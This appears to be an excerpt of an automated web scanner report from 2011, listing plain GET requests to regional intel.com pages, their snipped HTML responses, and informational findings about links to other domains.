intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:35 GMT Connection: close Connection: Transfer-Encoding Content-Length: 69332
GET /embedded/index.htm?iid=subhdr+devctr_emb HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:53 GMT Connection: close Connection: Transfer-Encoding Content-Length: 51050
GET /en_CA/index.htm?iid=gg_en_CA+noscript HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:18:14 GMT Content-Length: 27143 Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-US"> <head> <meta http-equiv=Content-Type content="text/html; charset=utf- ...[SNIP]... <div style="margin-left: 3px;"> <script src="http://widgets.twimg.com/j/2/widget.js"></script> ...[SNIP]... <li><a href="http://greatcomputing.ca/" target="_blank">Where to Buy</a> ...[SNIP]... <li><a href="http://www.myeg.net" target="_blank">Gaming with Team EG*</a> ...[SNIP]... <li><a href="http://www.youtube.com/user/channelintel#grid/user/9CDB6EFA1D89560B" target="_blank">Intel® World of Tomorrow webisodes</a> ...[SNIP]... <li><a href="http://www.profitguide.com/topic/intel" target="_blank">PROFIT* Business Solutions</a> ...[SNIP]... <li><a href="http://www.theglobeandmail.com/report-on-business/small-business/next-big-thing" target="_blank">Innovation for small business</a> ...[SNIP]... <li><a href="http://www.itworldcanada.com/category/information-architecture" target="_blank">Information architecture knowledge centre </a> ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a> ...[SNIP]...
The response contains the following links to other domains:
http://www.facebook.com/IntelMalaysia
http://www.myintelblog.com/
Request
GET /en_MY/index.htm?iid=gg_en_MY+noscript HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:18:54 GMT Content-Length: 23989 Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-US"> <head> <meta http-equiv=Content-Type content="text/html; charset=utf- ...[SNIP]... </a>--> <a href="http://www.facebook.com/IntelMalaysia" onclick="var s='s_gs()'; waCustomLink(this,'facebook_my','e','wa_iid=home-my+facebook');" target="_blank"> <img src="/en_PH/pix/eng_764x150.jpg" alt="Make my mod win a cool custom-designed,custom-built desktop PC case mod! Enter here" title="Make my mod win a cool custom-designed,custom-built desktop PC c ...[SNIP]... <li><a href="http://www.myintelblog.com" onclick="var s='s_gs()'; waCustomLink(this,'my@Intel Blog','e','wa_iid=home-my+myintelblog');" target="_blank">my@Intel Blog</a> ...[SNIP]...
The response contains the following link to another domain:
http://www.facebook.com/IntelPhilippines
Request
GET /en_PH/index.htm?iid=gg_en_PH+noscript HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:01 GMT Content-Length: 22989 Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-US"> <head> <meta http-equiv=Content-Type content="text/html; charset=utf- ...[SNIP]... <div class="marquee-container"> <a href="http://www.facebook.com/IntelPhilippines" onclick="var s='s_gs()'; waCustomLink(this,'facebook_ph','e','wa_iid=home-ph+facebook');" target="_blank"> <img src="/en_PH/pix/eng_764x150.jpg" alt="Make my mod win a cool custom-designed,custom-built desktop PC case mod! Enter here" title="Make my mod win a cool custom-designed,custom-built desktop PC c ...[SNIP]...
GET /en_SA/consumer/products/processors/index.htm?iid=gg_en_EG+noscript HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:18:20 GMT Connection: close Connection: Transfer-Encoding Content-Length: 39045
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-SA" lang="en-SA">
The response contains the following link to another domain:
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /en_US/worldwide.htm?iid=hdr+location HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:17:58 GMT Connection: close Connection: Transfer-Encoding Content-Length: 33270
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Intel World ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a> ...[SNIP]...
The response contains the following links to other domains:
http://www.dialogoti.com/
http://www.intc.com/index.cfm?iid=ftr-LA+invrel
Request
GET /espanol/business/index.htm?iid=gg_es_AR+noscript HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:18:14 GMT Connection: close Connection: Transfer-Encoding Content-Length: 33061
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="es-MX"> <head> <meta http-equiv=Content-Type content="text/html; charset=UTF-8"> ...[SNIP]... <li><a href="http://www.dialogoti.com" target="_blank">Diálogo TI Destacado: Entrenamientos de TI y m..s</a> ...[SNIP]... <p> <a href="http://www.dialogoti.com" target="_blank">Diálogo TI Destacado</a> ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr-LA+invrel">Relaciones con inversores</a> ...[SNIP]...
GET /feedback.htm?iid=ftr+contact HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:45 GMT Content-Length: 31921 Connection: close
GET /fr_CA/index.htm?iid=gg_fr_CA+noscript HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:18:14 GMT Content-Length: 26344 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The response contains the following link to another domain:
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
